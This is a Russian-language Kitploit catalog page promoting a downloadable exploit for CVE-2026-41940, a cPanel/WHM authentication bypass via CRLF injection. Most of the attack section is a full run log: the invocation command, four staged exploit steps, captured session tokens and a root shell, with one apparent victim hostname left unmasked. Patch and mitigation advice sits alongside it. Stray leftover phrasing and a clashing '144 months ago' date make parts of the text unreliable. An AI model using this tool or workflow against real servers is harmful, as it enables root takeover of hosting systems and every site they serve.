Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41940 — CVE-2026-41940 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2026-41940
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHub0xblackash/cve-2026-41940

CVE-2026-41940

CVE-2026-41940

Репозиторий
144 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚠️ CVE-2026-41940 — Обход аутентификации cPanel и WHM

ChatGPT Image May 1, 2026, 08_27_37 PM
CVSS 9.8 Critical Actively Exploited

Критический обход предварительной аутентификации в cPanel и WHM


📌 Обзор

CVE-2026-41940 — это критическая уязвимость обхода аутентификации, затрагивающая cPanel и WHM, а также WP Squared.

Неаутентифицированный удалённый злоумышленник может полностью обойти процедуру входа и получить полный административный доступ (root/WHM) к серверу.

Уязвимость активно эксплуатировалась в дикой природе до выпуска исправления.


🎯 Серьёзность


🛠️ Затронутые продукты

  • cPanel и WHM — все версии после 11.40 до выхода исправления
  • WP Squared — версии до 136.1.7

~1,5 миллиона экземпляров cPanel потенциально были подвержены уязвимости на момент раскрытия информации.


🔥 Воздействие

Успешная эксплуатация позволяет злоумышленникам:

  • Получить полный доступ WHM/root
  • Захватить все размещённые веб-сайты и учётные записи
  • Изменять конфигурации сервера
  • Похищать конфиденциальные данные
  • Внедрять постоянные бэкдоры

✅ Вот как выглядит УСПЕХ (как на скриншоте Eye Security, который вы показывали):

Если всё работает, вы должны увидеть нечто подобное:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2026-41940.py -u https://xx.xx.xx.xx:2087 --action shell                      
[sudo] password for kali: 


 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection
  4-stage: preauth → CRLF inject → propagate → verify → post-exploit
  Author : Ashraf Zaryouh / @0xBlackash

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : shell

13:41:18 [SCAN] Starting 4-stage exploit chain... https://xx.xx.xx.xx:2087
13:41:19 [INFO] Canonical hostname discovered: server.xxxxxxx.xx
13:41:19 [INFO] Canonical: server.softsms.in
13:41:19 [STEP] Stage 1/4 — Minting preauth session...
13:41:20 [  OK] Stage1: preauth session = :W43DhFApxxxD8Jdw...
13:41:20 [STEP] Stage 2/4 — CRLF injection via Authorization header...
13:41:21 [  OK] Stage2: HTTP 307 → token=/cpsess263xxxx267
13:41:21 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
13:41:22 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
13:41:22 [STEP] Stage 4/4 — Verifying WHM root access...
13:41:24 [INFO] Stage4: HTTP 200  {"version":"11.86.0.40"}
13:41:24 [PWND] CVE-2026-41940 CONFIRMED — WHM root access!  https://xx.xx.xx.xx:2087
13:41:24 [PWND]   Token    : /cpsess2634xxxx267
13:41:24 [PWND]   Session  : :W43DhFApxxxD8Jdw...
13:41:24 [PWND]   Version  : 11.86.0.40
13:41:24 [PWND]   API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
13:41:24 [ API] Running post-exploit action: shell

════════════════════════════════════════════════════════════
  WHM Shell — server.xxxxxxx.xx
  Version: CVE-2026-41940 | Auth: CRLF bypass
  Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════

[email protected] ▶ id
13:41:28 [ API] gethostname → HTTP 500
  uid=0(root) gid=0(root) groups=0(root)
[email protected] ▶ exit
Exiting shell.

══════════════════════════════════════════════════════════════════════
  CVE-2026-41940.py — CVE-2026-41940 Scan Complete
  Time: 13.9s  ·  Targets: 1
──────────────────────────────────────────────────────────────────────

  ⚡ 1 VULNERABLE TARGET(S)

  Target   : https://xx.xx.xx.xx:2087
  Version  : 11.86.0.40
  Token    : /cpsess263xxxx267
  API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
  Session  : :W43DhFApxxxD8Jdw...
  Evidence : {"version":"11.86.0.40"}

══════════════════════════════════════════════════════════════════════


✅ Исправленные версии

Исправление выпущено 28 апреля 2026 года

  • Обновите cPanel и WHM до последней сборки
  • Обновите WP Squared до версии 136.1.7 или новее

Рекомендуются немедленные действия


🛡️ Смягчение последствий и защита

  • Немедленно обновитесь до последней версии
  • Заблокируйте публичный доступ к портам 2082, 2083, 2086, 2087
  • Включите правила WAF (Cloudflare, ModSecurity и т. п.)
  • Используйте белые списки IP или VPN для управленческого доступа

📚 Ссылки

  • NVD — CVE-2026-41940
  • watchTowr Labs — технический разбор
  • Официальное уведомление безопасности cPanel
  • Каталог CISA KEV


Сделано с ❤️ для сообщества специалистов по безопасности

Последнее обновление: май 2026 года

Скачать инструмент
МетрикаЗначение
Оценка CVSS 3.19.8 (Критическая)
Оценка CVSS 4.09.3 (Критическая)
Вектор атакиСетевой
СложностьНизкая
ПривилегииНе требуются
Взаимодействие с пользователемНе требуется